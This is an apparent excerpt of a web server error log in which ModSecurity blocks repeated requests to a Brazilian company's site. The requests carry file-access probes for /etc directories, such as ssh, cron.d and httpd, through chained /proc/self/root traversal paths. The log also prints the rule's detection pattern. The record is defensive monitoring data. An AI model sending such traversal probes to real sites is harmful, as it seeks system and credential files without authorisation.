"ab1Olta6ubjKNq_cu4b7zAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:43.665888 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:38476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OlzJ3M9BSuKP7CAZEmwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:44.111580 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.36:41548] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1OmPXLqtnMIWvjpaK9KQAAAo0"]
[Fri Mar 20 10:41:44.447901 2026] [:error] [pid 7235:tid 140411574073088] [client 57.141.18.7:41558] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1OmPqxLDW4GITHUkQLjgAAARQ"]
[Fri Mar 20 10:41:44.952705 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.241.31:38484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OmF1pVZ5mVmJwsFNRrQAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:46.307328 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.241.31:38498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OmjJ3M9BSuKP7CAZEnwAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:47.766142 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:56960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OmwF0L0L-SsrnPo6LQQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:49.566899 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:56962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OneoXxyEfFpUF8f-iXwAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:49.626346 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:47878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OnDJ3M9BSuKP7CAZEpgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:52.792135 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:56970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1On_XLqtnMIWvjpaK9OQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:54.896361 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:56980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Oota6ubjKNq_cu4b71AAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:56.316371 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.241.31:56990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OpPHIg5MgXLBnicMYXAAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:57.563362 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:46412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OpTJ3M9BSuKP7CAZErwAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:41:58.955239 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.82:42378] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OphCii7xarUs8iHaMmAAAAgY"]
[Fri Mar 20 10:41:59.307827 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:46414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Op_qxLDW4GITHUkQLmQAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:42:00.646954 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:46418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OqNa6ubjKNq_cu4b73gAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:42:01.861789 2026] [mime_magic:error] [pid 11167:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:42582] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:42:02.354648 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:46430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OqjJ3M9BSuKP7CAZEuQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:42:04.455394 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:46440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OrPXLqtnMIWvjpaK9SAAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:42:04.727349 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:46440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OrPXLqtnMIWvjpaK9SQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:42:09.196925 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.20:42854] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OsV1pVZ5mVmJwsFNR0wAAAE8"]
[Fri Mar 20 10:42:14.938196 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.10:43256] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1OtjJ3M9BSuKP7CAZE0AAAAIc"]
[Fri Mar 20 10:42:15.251434 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:46452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ot_XLqtnMIWvjpaK9VQAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:42:16.573788 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:38528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OuNa6ubjKNq_cu4b8AwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:42:17.767899 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.241.31:41688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OuV1pVZ5mVmJwsFNR2AAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
